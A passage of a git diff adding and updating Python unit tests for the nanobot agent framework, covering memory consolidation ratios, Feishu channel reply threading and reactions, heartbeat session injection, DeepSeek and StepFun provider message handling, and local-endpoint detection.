b/tests/agent/test_consolidation_ratio.py new file mode 100644 index 000000000..b1c95ec4b --- /dev/null +++ b/tests/agent/test_consolidation_ratio.py @@ -0,0 +1,108 @@ +"""Tests for configurable consolidation_ratio.""" + +from unittest.mock import AsyncMock, MagicMock + +import pytest +from pydantic import ValidationError + +import nanobot.agent.memory as memory_module +from nanobot.agent.loop import AgentLoop +from nanobot.bus.queue import MessageBus +from nanobot.config.schema import AgentDefaults +from nanobot.providers.base import GenerationSettings, LLMResponse + + +def _make_loop( + tmp_path, + *, + estimated_tokens: int = 0, + context_window_tokens: int = 200, + consolidation_ratio: float = 0.5, +) -> AgentLoop: + provider = MagicMock() + provider.get_default_model.return_value = "test-model" + provider.generation = GenerationSettings(max_tokens=0) + provider.estimate_prompt_tokens.return_value = (estimated_tokens, "test-counter") + _response = LLMResponse(content="ok", tool_calls=[]) + provider.chat_with_retry = AsyncMock(return_value=_response) + provider.chat_stream_with_retry = AsyncMock(return_value=_response) + + loop = AgentLoop( + bus=MessageBus(), + provider=provider, + workspace=tmp_path, + model="test-model", + context_window_tokens=context_window_tokens, + consolidation_ratio=consolidation_ratio, + ) + loop.tools.get_definitions = MagicMock(return_value=[]) + loop.consolidator._SAFETY_BUFFER = 0 + return loop + + +def _session_with_turns(loop: AgentLoop, *, turns: int): + session = loop.sessions.get_or_create("cli:test") + session.messages = [] + for i in range(turns): + session.messages.append({"role": "user", "content": f"u{i}", "timestamp": f"2026-01-01T00:00:{i:02d}"}) + session.messages.append({"role": "assistant", "content": f"a{i}", "timestamp": f"2026-01-01T00:01:{i:02d}"}) + loop.sessions.save(session) + return session + + +@pytest.mark.asyncio +@pytest.mark.parametrize( + ("ratio", "context_window_tokens", "estimates", "expected_archives"), + [ + (0.5, 200, [250, 90], 1), + (0.1, 1000, [1200, 800, 400, 50], 2), + (0.9, 200, [300, 175], 1), + ], +) +async def test_consolidation_ratio_controls_target( + tmp_path, + monkeypatch, + ratio: float, + context_window_tokens: int, + estimates: list[int], + expected_archives: int, +) -> None: + loop = _make_loop( + tmp_path, + context_window_tokens=context_window_tokens, + consolidation_ratio=ratio, + ) + loop.consolidator.archive = AsyncMock(return_value=True) # type: ignore[method-assign] + session = _session_with_turns(loop, turns=10) + + remaining_estimates = list(estimates) + + def mock_estimate(_session, *, session_summary=None): + assert session_summary is None + return (remaining_estimates.pop(0), "test") + + loop.consolidator.estimate_session_prompt_tokens = mock_estimate # type: ignore[method-assign] + monkeypatch.setattr(memory_module, "estimate_message_tokens", lambda _m: 100) + + await loop.consolidator.maybe_consolidate_by_tokens(session) + + assert loop.consolidator.archive.await_count == expected_archives + + +def test_ratio_propagated_from_config_schema() -> None: + defaults = AgentDefaults() + assert defaults.consolidation_ratio == 0.5 + + defaults = AgentDefaults.model_validate({"consolidationRatio": 0.3}) + assert defaults.consolidation_ratio == 0.3 + + dumped = defaults.model_dump(by_alias=True) + assert dumped["consolidationRatio"] == 0.3 + + +def test_ratio_validation_rejects_out_of_range() -> None: + with pytest.raises(ValidationError): + AgentDefaults(consolidation_ratio=0.05) + + with pytest.raises(ValidationError): + AgentDefaults(consolidation_ratio=1.0) diff --git a/tests/channels/test_feishu_reaction.py b/tests/channels/test_feishu_reaction.py index 479e3dc98..68229e267 100644 --- a/tests/channels/test_feishu_reaction.py +++ b/tests/channels/test_feishu_reaction.py @@ -1,6 +1,6 @@ """Tests for Feishu reaction add/remove and auto-cleanup on stream end.""" from types import SimpleNamespace -from unittest.mock import AsyncMock, MagicMock, patch +from unittest.mock import AsyncMock, MagicMock import pytest @@ -160,19 +160,38 @@ class TestRemoveReactionAsync: class TestStreamEndReactionCleanup: + @pytest.mark.asyncio + async def test_stream_buffers_are_scoped_by_message_id(self): + ch = _make_channel() + ch._create_streaming_card_sync = MagicMock(return_value=None) + + await ch.send_delta( + "oc_chat1", "first", + metadata={"message_id": "om_first"}, + ) + await ch.send_delta( + "oc_chat1", "second", + metadata={"message_id": "om_second"}, + ) + + assert ch._stream_bufs["om_first"].text == "first" + assert ch._stream_bufs["om_second"].text == "second" + assert "oc_chat1" not in ch._stream_bufs + @pytest.mark.asyncio async def test_removes_reaction_on_stream_end(self): ch = _make_channel() ch._stream_bufs["oc_chat1"] = _FeishuStreamBuf( text="Done", card_id="card_1", sequence=3, last_edit=0.0, ) + ch._reaction_ids["om_001"] = "rx_42" ch._client.cardkit.v1.card_element.content.return_value = MagicMock(success=MagicMock(return_value=True)) ch._client.cardkit.v1.card.settings.return_value = MagicMock(success=MagicMock(return_value=True)) ch._remove_reaction = AsyncMock() await ch.send_delta( "oc_chat1", "", - metadata={"_stream_end": True, "message_id": "om_001", "reaction_id": "rx_42"}, + metadata={"_stream_end": True, "message_id": "om_001"}, ) ch._remove_reaction.assert_called_once_with("om_001", "rx_42") @@ -189,7 +208,7 @@ class TestStreamEndReactionCleanup: await ch.send_delta( "oc_chat1", "", - metadata={"_stream_end": True, "reaction_id": "rx_42"}, + metadata={"_stream_end": True}, ) ch._remove_reaction.assert_not_called() diff --git a/tests/channels/test_feishu_reply.py b/tests/channels/test_feishu_reply.py index 2ad466dcd..f7dc39e5d 100644 --- a/tests/channels/test_feishu_reply.py +++ b/tests/channels/test_feishu_reply.py @@ -3,7 +3,7 @@ import asyncio import json from pathlib import Path from types import SimpleNamespace -from unittest.mock import MagicMock, patch +from unittest.mock import AsyncMock, MagicMock, patch import pytest @@ -21,18 +21,18 @@ from nanobot.bus.events import OutboundMessage from nanobot.bus.queue import MessageBus from nanobot.channels.feishu import FeishuChannel, FeishuConfig - # --------------------------------------------------------------------------- # Helpers # --------------------------------------------------------------------------- -def _make_feishu_channel(reply_to_message: bool = False) -> FeishuChannel: +def _make_feishu_channel(reply_to_message: bool = False, group_policy: str = "mention") -> FeishuChannel: config = FeishuConfig( enabled=True, app_id="cli_test", app_secret="secret", allow_from=["*"], reply_to_message=reply_to_message, + group_policy=group_policy, ) channel = FeishuChannel(config, MessageBus()) channel._client = MagicMock() @@ -443,3 +443,288 @@ async def test_on_message_no_extra_api_call_when_no_parent_id() -> None: channel._client.im.v1.message.get.assert_not_called() assert len(captured) == 1 + + +# --------------------------------------------------------------------------- +# Session key derivation tests +# --------------------------------------------------------------------------- + + +@pytest.mark.asyncio +async def test_session_key_group_with_root_id_is_thread_scoped() -> None: + """Group message with root_id gets a thread-scoped session key.""" + channel = _make_feishu_channel(group_policy="open") + bus_spy = [] + original_publish = channel.bus.publish_inbound + + async def capture(msg): + bus_spy.append(msg) + await original_publish(msg) + + channel.bus.publish_inbound = capture + channel._download_and_save_media = AsyncMock(return_value=(None, "")) + channel.transcribe_audio = AsyncMock(return_value="") + channel._add_reaction = AsyncMock(return_value=None) + + event = _make_feishu_event( + chat_type="group", + content='{"text": "hello"}', + root_id="om_root123", + message_id="om_child456", + ) + await channel._on_message(event) + + assert len(bus_spy) == 1 + assert bus_spy[0].session_key == "feishu:oc_abc:om_root123" + + +@pytest.mark.asyncio +async def test_session_key_group_no_root_id_uses_message_id() -> None: + """Group message without root_id gets session keyed by message_id (per-message session).""" + channel = _make_feishu_channel(group_policy="open") + bus_spy = [] + original_publish = channel.bus.publish_inbound + + async def capture(msg): + bus_spy.append(msg) + await original_publish(msg) + + channel.bus.publish_inbound = capture + channel._download_and_save_media = AsyncMock(return_value=(None, "")) + channel.transcribe_audio = AsyncMock(return_value="") + channel._add_reaction = AsyncMock(return_value=None) + + event = _make_feishu_event( + chat_type="group", + content='{"text": "hello"}', + root_id=None, + message_id="om_001", + ) + await channel._on_message(event) + + assert len(bus_spy) == 1 + assert bus_spy[0].session_key == "feishu:oc_abc:om_001" + + +@pytest.mark.asyncio +async def test_session_key_private_chat_no_override() -> None: + """Private chat never overrides session key (consistent with Telegram/Slack).""" + channel = _make_feishu_channel() + bus_spy = [] + original_publish = channel.bus.publish_inbound + + async def capture(msg): + bus_spy.append(msg) + await original_publish(msg) + + channel.bus.publish_inbound = capture + channel._download_and_save_media = AsyncMock(return_value=(None, "")) + channel.transcribe_audio = AsyncMock(return_value="") + channel._add_reaction = AsyncMock(return_value=None) + + event = _make_feishu_event( + chat_type="p2p", + content='{"text": "hello"}', + root_id=None, + message_id="om_001", + ) + await channel._on_message(event) + + assert len(bus_spy) == 1 + assert bus_spy[0].session_key_override is None + + +# --------------------------------------------------------------------------- +# reply_in_thread tests +# --------------------------------------------------------------------------- + + +@pytest.mark.asyncio +async def test_reply_uses_reply_in_thread_when_enabled() -> None: + """When reply_to_message is True, reply includes reply_in_thread=True.""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = True + channel._client.im.v1.message.reply.return_value = reply_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + metadata={"message_id": "om_001"}, + )) + + channel._client.im.v1.message.reply.assert_called_once() + call_args = channel._client.im.v1.message.reply.call_args + request = call_args[0][0] + assert request.request_body.reply_in_thread is True + + +@pytest.mark.asyncio +async def test_reply_without_reply_in_thread_when_disabled() -> None: + """When reply_to_message is False, reply does NOT use reply_in_thread.""" + channel = _make_feishu_channel(reply_to_message=False) + + create_resp = MagicMock() + create_resp.success.return_value = True + channel._client.im.v1.message.create.return_value = create_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + )) + + # No message_id in metadata → no reply attempt, direct create + channel._client.im.v1.message.create.assert_called_once() + + +@pytest.mark.asyncio +async def test_reply_keeps_fallback_when_reply_fails() -> None: + """Even with reply_to_message=True, fallback to create on reply failure.""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = False + reply_resp.code = 99991400 + reply_resp.msg = "rate limited" + channel._client.im.v1.message.reply.return_value = reply_resp + + create_resp = MagicMock() + create_resp.success.return_value = True + channel._client.im.v1.message.create.return_value = create_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + metadata={"message_id": "om_001"}, + )) + + channel._client.im.v1.message.reply.assert_called() + channel._client.im.v1.message.create.assert_called() + + +@pytest.mark.asyncio +async def test_reply_no_reply_in_thread_for_p2p_chat() -> None: + """reply_in_thread should NOT be set for p2p chats (identified by chat_type).""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = True + channel._client.im.v1.message.reply.return_value = reply_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", # p2p chats also use oc_ prefix + content="hello", + metadata={"message_id": "om_001", "chat_type": "p2p"}, + )) + + channel._client.im.v1.message.reply.assert_called_once() + call_args = channel._client.im.v1.message.reply.call_args + request = call_args[0][0] + assert request.request_body.reply_in_thread is not True + + +@pytest.mark.asyncio +async def test_reply_uses_reply_in_thread_for_group_chat() -> None: + """reply_in_thread should be True for group chats (identified by chat_type).""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = True + channel._client.im.v1.message.reply.return_value = reply_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + metadata={"message_id": "om_001", "chat_type": "group"}, + )) + + channel._client.im.v1.message.reply.assert_called_once() + call_args = channel._client.im.v1.message.reply.call_args + request = call_args[0][0] + assert request.request_body.reply_in_thread is True + + +@pytest.mark.asyncio +async def test_reply_targets_message_id_when_in_topic() -> None: + """When inbound message is inside a topic (root_id != message_id), + the reply should target the inbound message_id (not root_id). + The Feishu Reply API keeps the response in the same topic + automatically when the target message is already inside a topic.""" + channel = _make_feishu_channel(reply_to_message=True) + + reply_resp = MagicMock() + reply_resp.success.return_value = True + channel._client.im.v1.message.reply.return_value = reply_resp + + await channel.send(OutboundMessage( + channel="feishu", + chat_id="oc_abc", + content="hello", + metadata={ + "message_id": "om_child456", + "chat_type": "group", + "root_id": "om_root123", + }, + )) + + channel._client.im.v1.message.reply.assert_called_once() + call_args = channel._client.im.v1.message.reply.call_args + request = call_args[0][0] + # Should reply to the inbound message_id, not the root + assert request.message_id == "om_child456" + assert request.request_body.reply_in_thread is True + + +def test_on_reaction_added_stores_reaction_id() -> None: + """_on_reaction_added stores the returned reaction_id in _reaction_ids.""" + channel = _make_feishu_channel() + loop = asyncio.new_event_loop() + try: + task = loop.create_task(asyncio.sleep(0, result="reaction_abc")) + loop.run_until_complete(task) + channel._on_reaction_added("om_001", task) + finally: + loop.close() + + assert channel._reaction_ids["om_001"] == "reaction_abc" + + +def test_on_reaction_added_skips_none_result() -> None: + """_on_reaction_added does not store None results.""" + channel = _make_feishu_channel() + loop = asyncio.new_event_loop() + try: + task = loop.create_task(asyncio.sleep(0, result=None)) + loop.run_until_complete(task) + channel._on_reaction_added("om_001", task) + finally: + loop.close() + + assert "om_001" not in channel._reaction_ids + + +def test_on_background_task_done_removes_from_set() -> None: + """_on_background_task_done removes task from tracking set.""" + channel = _make_feishu_channel() + loop = asyncio.new_event_loop() + try: + async def _fail(): + raise RuntimeError("test failure") + + task = loop.create_task(_fail()) + channel._background_tasks.add(task) + try: + loop.run_until_complete(task) + except RuntimeError: + pass # expected + channel._on_background_task_done(task) + finally: + loop.close() + + assert task not in channel._background_tasks diff --git a/tests/cli/test_commands.py b/tests/cli/test_commands.py index 2719beed1..8c86b32ac 100644 --- a/tests/cli/test_commands.py +++ b/tests/cli/test_commands.py @@ -8,6 +8,7 @@ from unittest.mock import AsyncMock, MagicMock, patch import pytest from typer.testing import CliRunner +from nanobot.agent.runtime import AgentRuntime from nanobot.bus.events import OutboundMessage from nanobot.cli.commands import _make_provider, app from nanobot.config.schema import Config @@ -776,6 +777,15 @@ def _stop_gateway_provider(_config) -> object: raise _StopGatewayError("stop") +def _test_agent_runtime(provider: object, config: Config) -> AgentRuntime: + return AgentRuntime( + provider=provider, + model=config.agents.defaults.model, + context_window_tokens=config.agents.defaults.context_window_tokens, + signature=("test",), + ) + + def _patch_cli_command_runtime( monkeypatch, config: Config, @@ -788,6 +798,8 @@ def _patch_cli_command_runtime( cron_service=None, get_cron_dir=None, ) -> None: + provider_factory = make_provider or (lambda _config: object()) + monkeypatch.setattr( "nanobot.config.loader.set_config_path", set_config_path or (lambda _path: None), @@ -800,7 +812,15 @@ def _patch_cli_command_runtime( ) monkeypatch.setattr( "nanobot.cli.commands._make_provider", - make_provider or (lambda _config: object()), + provider_factory, + ) + monkeypatch.setattr( + "nanobot.agent.runtime.build_agent_runtime", + lambda _config: _test_agent_runtime(provider_factory(_config), _config), + ) + monkeypatch.setattr( + "nanobot.agent.runtime.load_agent_runtime", + lambda _config_path=None: _test_agent_runtime(provider_factory(config), config), ) if message_bus is not None: @@ -941,8 +961,36 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context( monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config) monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None) monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: provider) + monkeypatch.setattr( + "nanobot.agent.runtime.build_agent_runtime", + lambda _config: _test_agent_runtime(provider, _config), + ) + monkeypatch.setattr( + "nanobot.agent.runtime.load_agent_runtime", + lambda _config_path=None: _test_agent_runtime(provider, config), + ) monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus) - monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object()) + + class _FakeSession: + def __init__(self) -> None: + self.messages = [] + + def add_message(self, role: str, content: str, **kwargs) -> None: + self.messages.append({"role": role, "content": content, **kwargs}) + + class _FakeSessionManager: + def __init__(self, _workspace: Path) -> None: + self.session = _FakeSession() + seen["session_manager"] = self + + def get_or_create(self, key: str) -> _FakeSession: + seen["session_key"] = key + return self.session + + def save(self, session: _FakeSession) -> None: + seen["saved_session"] = session + + monkeypatch.setattr("nanobot.session.manager.SessionManager", _FakeSessionManager) class _FakeCron: def __init__(self, _store_path: Path) -> None: @@ -1030,6 +1078,16 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context( content="Time to stretch.", ) ) + assert seen["session_key"] == "telegram:user-1" + saved_session = seen["saved_session"] + assert isinstance(saved_session, _FakeSession) + assert saved_session.messages == [ + { + "role": "assistant", + "content": "Time to stretch.", + "_channel_delivery": True, + } + ] def test_gateway_cron_job_suppresses_intermediate_progress( @@ -1052,6 +1110,14 @@ def test_gateway_cron_job_suppresses_intermediate_progress( monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config) monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None) monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: object()) + monkeypatch.setattr( + "nanobot.agent.runtime.build_agent_runtime", + lambda _config: _test_agent_runtime(object(), _config), + ) + monkeypatch.setattr( + "nanobot.agent.runtime.load_agent_runtime", + lambda _config_path=None: _test_agent_runtime(object(), config), + ) monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus) monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object()) diff --git a/tests/heartbeat/test_heartbeat_context_bridge.py b/tests/heartbeat/test_heartbeat_context_bridge.py new file mode 100644 index 000000000..5ec02a8bb --- /dev/null +++ b/tests/heartbeat/test_heartbeat_context_bridge.py @@ -0,0 +1,120 @@ +"""Tests for heartbeat context bridge — injecting delivered messages into channel session.""" + +from nanobot.session.manager import SessionManager + + +class TestHeartbeatContextBridge: + """Verify that on_heartbeat_notify injects the assistant message into the + channel session so user replies have conversational context.""" + + def test_notify_injects_into_channel_session(self, tmp_path): + """After notify, the target channel session should contain the + heartbeat response as an assistant turn.""" + session_mgr = SessionManager(tmp_path / "sessions") + target_key = "telegram:12345" + + # Simulate: session exists with one user message + target_session = session_mgr.get_or_create(target_key) + target_session.add_message("user", "hello earlier") + session_mgr.save(target_session) + + # Simulate what on_heartbeat_notify does + target_session = session_mgr.get_or_create(target_key) + target_session.add_message( + "assistant", + "3 new emails — invoice, meeting, proposal.", + _channel_delivery=True, + ) + session_mgr.save(target_session) + + # Reload and verify + reloaded = session_mgr.get_or_create(target_key) + messages = reloaded.get_history(max_messages=0) + roles = [m["role"] for m in messages] + assert roles == ["user", "assistant"] + assert "3 new emails" in messages[-1]["content"] + + def test_reply_after_injection_has_context(self, tmp_path): + """Simulates the full flow: prior conversation exists, heartbeat + injects, then user replies. The session should have the heartbeat + message visible in get_history so the model sees the context.""" + session_mgr = SessionManager(tmp_path / "sessions") + target_key = "telegram:12345" + + # Pre-existing conversation (user has chatted before) + session = session_mgr.get_or_create(target_key) + session.add_message("user", "Hey") + session.add_message("assistant", "Hi there!") + session_mgr.save(session) + + # Step 1: heartbeat injects assistant message + session = session_mgr.get_or_create(target_key) + session.add_message( + "assistant", + "If you want, I can mark that email as read.", + _channel_delivery=True, + ) + session_mgr.save(session) + + # Step 2: user replies "Sure" + session = session_mgr.get_or_create(target_key) + session.add_message("user", "Sure") + session_mgr.save(session) + + # Verify: get_history includes the heartbeat injection + reloaded = session_mgr.get_or_create(target_key) + history = reloaded.get_history(max_messages=0) + roles = [m["role"] for m in history] + assert roles == ["user", "assistant", "assistant", "user"] + assert "mark that email" in history[2]["content"] + assert history[3]["content"] == "Sure" + + def test_injection_does_not_duplicate_on_existing_history(self, tmp_path): + """If the channel session already has messages, the injection + appends cleanly without corruption.""" + session_mgr = SessionManager(tmp_path / "sessions") + target_key = "telegram:12345" + + # Pre-existing conversation + session = session_mgr.get_or_create(target_key) + session.add_message("user", "What time is it?") + session.add_message("assistant", "It's 2pm.") + session.add_message("user", "Thanks") + session_mgr.save(session) + + # Heartbeat injects + session = session_mgr.get_or_create(target_key) + session.add_message( + "assistant", + "You have a meeting in 30 minutes.", + _channel_delivery=True, + ) + session_mgr.save(session) + + # Verify + reloaded = session_mgr.get_or_create(target_key) + history = reloaded.get_history(max_messages=0) + roles = [m["role"] for m in history] + assert roles == ["user", "assistant", "user", "assistant"] + assert "meeting in 30 minutes" in history[-1]["content"] + + def test_reply_after_injection_to_empty_session_keeps_context(self, tmp_path): + """A user replying to the first delivered message still sees that context.""" + session_mgr = SessionManager(tmp_path / "sessions") + target_key = "telegram:99999" + + session = session_mgr.get_or_create(target_key) + session.add_message( + "assistant", + "Weather alert: sandstorm expected at 4pm.", + _channel_delivery=True, + ) + session.add_message("user", "Sure") + session_mgr.save(session) + + reloaded = session_mgr.get_or_create(target_key) + history = reloaded.get_history(max_messages=0) + assert len(history) == 2 + assert history[0]["role"] == "assistant" + assert "sandstorm" in history[0]["content"] + assert history[1] == {"role": "user", "content": "Sure"} diff --git a/tests/providers/test_litellm_kwargs.py b/tests/providers/test_litellm_kwargs.py index dfa0f58ac..1c3cfb851 100644 --- a/tests/providers/test_litellm_kwargs.py +++ b/tests/providers/test_litellm_kwargs.py @@ -585,6 +585,81 @@ def test_openai_compat_preserves_message_level_reasoning_fields() -> None: assert sanitized[1]["tool_calls"][0]["extra_content"] == {"google": {"thought_signature": "sig"}} +def _deepseek_kwargs(messages: list[dict]) -> dict: + with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): + provider = OpenAICompatProvider( + api_key="sk-test", + default_model="deepseek-v4-flash", + spec=find_by_name("deepseek"), + ) + + return provider._build_kwargs( + messages=messages, + tools=None, + model="deepseek-v4-flash", + max_tokens=1024, + temperature=0.7, + reasoning_effort="high", + tool_choice=None, + ) + + +def _tool_call(call_id: str) -> dict: + return { + "id": call_id, + "type": "function", + "function": {"name": "my", "arguments": "{}"}, + } + + +def test_deepseek_thinking_drops_tool_history_missing_reasoning_content() -> None: + kwargs = _deepseek_kwargs([ + {"role": "system", "content": "system"}, + {"role": "user", "content": "can we use wechat?"}, + {"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]}, + {"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"}, + {"role": "user", "content": "continue"}, + ]) + + assert kwargs["messages"] == [ + {"role": "system", "content": "system"}, + {"role": "user", "content": "continue"}, + ] + + +def test_deepseek_thinking_keeps_tool_history_with_reasoning_content() -> None: + kwargs = _deepseek_kwargs([ + {"role": "user", "content": "can we use wechat?"}, + { + "role": "assistant", + "content": "", + "reasoning_content": "I should inspect supported channels.", + "tool_calls": [_tool_call("call_good")], + }, + {"role": "tool", "tool_call_id": "call_good", "name": "my", "content": "channels"}, + {"role": "user", "content": "continue"}, + ]) + + assistant = kwargs["messages"][1] + assert assistant["role"] == "assistant" + assert assistant["reasoning_content"] == "I should inspect supported channels." + assert kwargs["messages"][2]["role"] == "tool" + + +def test_deepseek_thinking_drops_current_bad_tool_turn_without_followup_user() -> None: + kwargs = _deepseek_kwargs([ + {"role": "system", "content": "system"}, + {"role": "user", "content": "can we use wechat?"}, + {"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]}, + {"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"}, + ]) + + assert kwargs["messages"] == [ + {"role": "system", "content": "system"}, + {"role": "user", "content": "can we use wechat?"}, + ] + + def test_openai_compat_keeps_tool_calls_after_consecutive_assistant_messages() -> None: with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): provider = OpenAICompatProvider() diff --git a/tests/providers/test_local_endpoint_detection.py b/tests/providers/test_local_endpoint_detection.py new file mode 100644 index 000000000..fe45b90aa --- /dev/null +++ b/tests/providers/test_local_endpoint_detection.py @@ -0,0 +1,118 @@ +"""Tests for _is_local_endpoint detection and keepalive configuration.""" + +from unittest.mock import MagicMock + +from nanobot.providers.openai_compat_provider import ( + OpenAICompatProvider, + _is_local_endpoint, +) + + +def _make_spec(is_local: bool = False) -> MagicMock: + spec = MagicMock() + spec.is_local = is_local + return spec + + +class TestIsLocalEndpoint: + """Test the _is_local_endpoint helper.""" + + def test_spec_is_local_true(self): + assert _is_local_endpoint(_make_spec(is_local=True), None) is True + + def test_spec_is_local_false_no_base(self): + assert _is_local_endpoint(_make_spec(is_local=False), None) is False + + def test_no_spec_no_base(self): + assert _is_local_endpoint(None, None) is False + + def test_localhost(self): + assert _is_local_endpoint(None, "http://localhost:1234/v1") is True + + def test_localhost_https(self): + assert _is_local_endpoint(None, "https://localhost:8080/v1") is True + + def test_loopback_127(self): + assert _is_local_endpoint(None, "http://127.0.0.1:11434/v1") is True + + def test_private_192_168(self): + assert _is_local_endpoint(None, "http://192.168.8.188:1234/v1") is True + + def test_private_10(self): + assert _is_local_endpoint(None, "http://10.0.0.5:8000/v1") is True + + def test_private_172_16(self): + assert _is_local_endpoint(None, "http://172.16.0.1:1234/v1") is True + + def test_private_172_31(self): + assert _is_local_endpoint(None, "http://172.31.255.255:1234/v1") is True + + def test_not_private_172_32(self): + assert _is_local_endpoint(None, "http://172.32.0.1:1234/v1") is False + + def test_docker_internal(self): + assert _is_local_endpoint(None, "http://host.docker.internal:11434/v1") is True + + def test_ipv6_loopback(self): + assert _is_local_endpoint(None, "http://[::1]:1234/v1") is True + + def test_public_api(self): + assert _is_local_endpoint(None, "https://api.openai.com/v1") is False + + def test_openrouter(self): + assert _is_local_endpoint(None, "https://openrouter.ai/api/v1") is False + + def test_spec_overrides_public_url(self): + """spec.is_local=True takes precedence even with a public-looking URL.""" + assert _is_local_endpoint(_make_spec(is_local=True), "https://api.example.com/v1") is True + + def test_case_insensitive(self): + assert _is_local_endpoint(None, "http://LOCALHOST:1234/v1") is True + + def test_trailing_slash(self): + assert _is_local_endpoint(None, "http://192.168.1.1:8080/v1/") is True + + def test_public_hostname_containing_localhost_is_not_local(self): + assert _is_local_endpoint(None, "https://notlocalhost.example/v1") is False + + def test_public_hostname_containing_private_ip_prefix_is_not_local(self): + assert _is_local_endpoint(None, "https://api10.example.com/v1") is False + + def test_url_without_scheme(self): + assert _is_local_endpoint(None, "192.168.1.1:8080/v1") is True + + +class TestLocalKeepaliveConfig: + """Verify that local endpoints get keepalive_expiry=0.""" + + def test_local_spec_disables_keepalive(self): + spec = _make_spec(is_local=True) + spec.env_key = "" + spec.default_api_base = "http://localhost:11434/v1" + provider = OpenAICompatProvider( + api_key="test", api_base="http://localhost:11434/v1", spec=spec, + ) + pool = provider._client._client._transport._pool + assert pool._keepalive_expiry == 0 + + def test_lan_ip_disables_keepalive(self): + """A generic 'openai' spec with a LAN IP should still disable keepalive.""" + spec = _make_spec(is_local=False) + spec.env_key = "" + spec.default_api_base = None + provider = OpenAICompatProvider( + api_key="test", api_base="http://192.168.8.188:1234/v1", spec=spec, + ) + pool = provider._client._client._transport._pool + assert pool._keepalive_expiry == 0 + + def test_cloud_keeps_default_keepalive(self): + spec = _make_spec(is_local=False) + spec.env_key = "" + spec.default_api_base = "https://api.openai.com/v1" + provider = OpenAICompatProvider( + api_key="test", api_base=None, spec=spec, + ) + pool = provider._client._client._transport._pool + # Default httpx keepalive is 5.0s + assert pool._keepalive_expiry == 5.0 diff --git a/tests/providers/test_stepfun_reasoning.py b/tests/providers/test_stepfun_reasoning.py index 05e5416d4..8d7cbdb91 100644 --- a/tests/providers/test_stepfun_reasoning.py +++ b/tests/providers/test_stepfun_reasoning.py @@ -9,6 +9,17 @@ from types import SimpleNamespace from unittest.mock import patch from nanobot.providers.openai_compat_provider import OpenAICompatProvider +from nanobot.providers.registry import ProviderSpec + +_STEPFUN_SPEC = ProviderSpec( + name="stepfun", + keywords=("stepfun", "step"), + env_key="STEPFUN_API_KEY", + display_name="Step Fun", + backend="openai_compat", + default_api_base="https://api.stepfun.com/v1", + reasoning_as_content=True, +) # ── _parse: dict branch ───────────────────────────────────────────────────── @@ -17,7 +28,7 @@ from nanobot.providers.openai_compat_provider import OpenAICompatProvider def test_parse_dict_stepfun_reasoning_fallback() -> None: """When content is None and reasoning exists, content falls back to reasoning.""" with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): - provider = OpenAICompatProvider() + provider = OpenAICompatProvider(spec=_STEPFUN_SPEC) response = { "choices": [{ @@ -39,7 +50,7 @@ def test_parse_dict_stepfun_reasoning_fallback() -> None: def test_parse_dict_stepfun_reasoning_priority() -> None: """reasoning_content field takes priority over reasoning when both present.""" with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): - provider = OpenAICompatProvider() + provider = OpenAICompatProvider(spec=_STEPFUN_SPEC) response = { "choices": [{ @@ -75,7 +86,7 @@ def _make_sdk_message(content, reasoning=None, reasoning_content=None): def test_parse_sdk_stepfun_reasoning_fallback() -> None: """SDK branch: content falls back to msg.reasoning when content is None.""" with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): - provider = OpenAICompatProvider() + provider = OpenAICompatProvider(spec=_STEPFUN_SPEC) msg = _make_sdk_message(content=None, reasoning="After analysis: result is 4.") choice = SimpleNamespace(finish_reason="stop", message=msg) @@ -90,7 +101,7 @@ def test_parse_sdk_stepfun_reasoning_fallback() -> None: def test_parse_sdk_stepfun_reasoning_priority() -> None: """reasoning_content field takes priority over reasoning in SDK branch.""" with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): - provider = OpenAICompatProvider() + provider = OpenAICompatProvider(spec=_STEPFUN_SPEC) msg = _make_sdk_message( content=None, @@ -244,3 +255,44 @@ def test_parse_chunks_sdk_reasoning_precedence() -> None: result = OpenAICompatProvider._parse_chunks(chunks) assert result.reasoning_content == "formal: " + + +# ── Regression: non-StepFun providers must NOT promote reasoning to content ─ + + +def test_parse_dict_non_stepfun_no_reasoning_as_content() -> None: + """Providers without reasoning_as_content flag must not treat reasoning as content.""" + with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"): + provider = OpenAICompatProvider() + + response = { + "choices": [{ + "message": { + "content": None, + "reasoning": "internal thought process that should NOT be shown to user", + }, + "finish_reason": "stop", + }], + } + + result = provider._parse(response) + + # content stays None — reasoning is NOT promoted + assert result.content is None + # reasoning still goes to reasoning_content for display as thinking + assert result.reasoning_content == "internal thought process that should NOT be shown to 